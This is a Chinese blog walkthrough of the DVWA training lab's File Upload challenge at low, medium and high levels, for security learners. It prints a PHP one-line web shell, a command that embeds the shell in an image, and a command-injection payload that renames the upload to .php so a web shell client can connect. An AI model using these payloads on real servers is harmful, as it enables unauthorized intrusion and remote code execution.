【dvwa靶场:File Upload系列】File Upload低-中-高级别,通关啦

目录

一、low级别,直接上传木马文件

1.1、准备一个木马文件

1.2、直接上传木马文件

1.3、访问木马链接

1.4、连接蚁剑

二、medium级别:抓包文件缀名

2.1、准备一个木马文件,修改后缀名为图片的后缀名

2.2、上传文件,打开burpSuite,抓上传的包,修改后缀名为php,放行

2.3、访问木马文件链接

2.4、连接蚁剑

三、high级别:木马图片,命令执行修改为木马文件

3.1、准备一个真实小图片,命名自定义,以下是示例

3.2、准备一个木马文件

3.3、生成木马图片:cmd进入图片文件夹所在路径,执行生成木马图片命令

[3.4、上传文件 ,成功后复制路径](#3.4、上传文件 ,成功后复制路径)

[3.5、在Command Injection板块命令执行:修改木马图片为可行性木马文件](#3.5、在Command Injection板块命令执行:修改木马图片为可行性木马文件)

​3.6、访问修改后的,就是修改后的路径:你的dvwa路径拼接上这个文件路径,回车就自动成功那个路径

3.7、蚁剑连接:木马链接和木马密码


一、low级别,直接上传木马文件

1.1、准备一个木马文件

1.2、直接上传木马文件

1.3、访问木马链接

1.4、连接蚁剑

二、medium级别:抓包文件缀名

2.1、准备一个木马文件,修改后缀名为图片的后缀名

2.2、上传文件,打开burpSuite,抓上传的包,修改后缀名为php,放行

2.3、访问木马文件链接

2.4、连接蚁剑

三、high级别:木马图片,命令执行修改为木马文件

3.1、准备一个真实小图片,命名自定义,以下是示例

3.2、准备一个木马文件

复制代码
<?php @eval($_POST['pass']);?>

3.3、生成木马图片:cmd进入图片文件夹所在路径,执行生成木马图片命令

复制代码
copy 真实图片.后缀名/b+木马文件.后缀名 木马图片.真实图片后缀名

3.4、上传文件 ,成功后复制路径

3.5、在Command Injection板块命令执行:修改木马图片为可行性木马文件

复制代码
127.0.0.1|move ../../hackable/uploads/你的木马图片 ../../hackable/uploads/修改后的木马文件

例如我的:127.0.0.1|move ../../hackable/uploads/mua.jpg ../../hackable/uploads/mua.php

3.6、访问修改后的,就是修改后的路径:你的dvwa路径拼接上这个文件路径,回车就自动成功那个路径

http://127.0.0.1/dvwa/vulnerabilities/exec/../../hackable/uploads/mua.php直接回车,变成下方的木马文件链接

http://127.0.0.1/dvwa/hackable/uploads/mua.php

3.7、蚁剑连接:木马链接和木马密码

相关推荐
纷飞的花火丶8 小时前
Oracle数据库注入基础入门
网络安全·oracle·sql注入
上海云盾商务经理杨杨14 小时前
2025年电商小程序小量DDoS攻击防护指南:从小流量到大威胁的全面防护方案
网络安全·小程序·ddos
小苑同学18 小时前
PaperReading:《Manipulating Multimodal Agents via Cross-Modal Prompt Injection》
人工智能·网络安全·语言模型·prompt·安全性测试
安达天下1 天前
Al驱动下的智能网联汽车创新与应用专题培训
网络安全·功能安全·aspice·预期功能安全·安达天下
大有数据可视化1 天前
金融系统的“防火墙”:数字孪生如何模拟风险攻击
网络安全·金融·数字孪生·智慧金融
Bruce_Liuxiaowei1 天前
SOCKS与防火墙:穿透与守护的网络安全协奏曲
网络·安全·web安全·网络安全
零信任Enlink_Young1 天前
企业协同办公平台与零信任安全防护的融合实践
网络安全
emma羊羊2 天前
【CSRF】防御
前端·网络安全·csrf
emma羊羊2 天前
【CSRF】跨站请求伪造
前端·网络安全·csrf
猫耳君2 天前
汽车网络安全 CyberSecurity ISO/SAE 21434 测试之三
安全·web安全·网络安全·汽车·测试·cyber·cybersecurity